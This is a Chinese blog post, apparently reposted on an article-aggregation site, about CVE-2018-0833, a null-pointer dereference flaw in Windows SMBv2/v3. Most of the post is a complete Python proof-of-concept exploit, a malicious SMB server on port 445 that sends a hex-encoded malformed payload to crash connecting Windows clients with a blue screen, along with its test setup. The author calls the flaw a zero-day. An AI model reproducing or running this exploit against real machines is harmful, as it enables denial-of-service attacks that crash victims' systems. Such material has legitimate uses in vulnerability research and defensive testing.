美文网首页
CVE-2018-0833:SMBv2及v3空指针引用DoS漏洞

CVE-2018-0833:SMBv2及v3空指针引用DoS漏洞

作者: 皮一下怎么了 | 来源:发表于2018-09-10 13:47 被阅读0次

PoC已经在Windows 8.1 (x86)和Windows Server 2012 R2 (x64)上测试通过,目前该漏洞为 0Day漏洞

测试环境

Windows8.1 (X64):靶机
树莓派:恶意SMB服务器

PoC

import SocketServer
from binascii import unhexlify
payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141' 
class byebye(SocketServer.BaseRequestHandler):
        def handle(self):
                try:
                    print "From:", self.client_address
                    print "[*]Sending Payload..."
                    self.request.send(unhexlify(payload))
                except Exception:
                    print "BSoD Triggered on", self.client_address
                    pass
SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),byebye)
launch.serve_forever()

视频验证

CVE-2018-0833

经测试PoC在Windows 8.1 (x64)同样有效

参考资料
https://krbtgt.pw/smbv3-null-pointer-dereference-vulnerability/#intro
http://toutiao.secjia.com/cve-2018-0833

相关文章

  • CVE-2018-0833:SMBv2及v3空指针引用DoS漏洞

    PoC已经在Windows 8.1 (x86)和Windows Server 2012 R2 (x64)上测试通过...

  • CVE-2016-0095提权漏洞学习笔记

    一.前言 1.漏洞信息该漏洞是在win32k中的bGetRealizedBrush产生的,是一个内核空指针解引用的...

  • Java空指针异常:java.lang.NullPointerE

    1.什么是空指针 指针只存在于c语言中,Java中是没有指针的,空指针就是空引用,java空指针异常就是引用本身为...

  • CVE-2018-8120 的调试

    POC: v3没有判断 NULL空指针导致了如下分析(IDA 截图): v3是tagWINDOWSTATION.s...

  • C++基本问题——指针与引用的区别

    指针与引用的区别 指针可以是空指针,但是引用不能是空引用。这就导致下面一个区别。 指针可能是非法的,引用总是合法的...

  • 指针和引用

    指针和引用的区别: 主要是两点: 引用使用时必须非空即必须初始化为非空值,指针则初始化时可以为空; 引用初始化后不...

  • 常见的错误总结

    NullPointerException - 空指针引用异常 ClassCastException - 类型强制转...

  • 找不到工作的人还在学习(c++2)

    一、指针与引用 1、指针和引用的差别 (1)非空区别。在任何情况下都不能使用指向空值的引用。一个引用必须总是指向某...

  • 绿盟面试准备

    C++基础知识 指针和引用的区别: 指针是一个变量 ,引用是别名.指针可以初始化为空, 引用必须初始化为具体的值....

  • C++智能指针

    引用计数技术及智能指针的简单实现 基础对象类 辅助类 智能指针类 使用测试 参考: C++ 引用计数技术及智能指针...

网友评论

      本文标题:CVE-2018-0833:SMBv2及v3空指针引用DoS漏洞

      本文链接:https://www.haomeiwen.com/subject/anksgftx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|CVE-2018-0833:SMBv2及v3空指针引用DoS漏洞|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!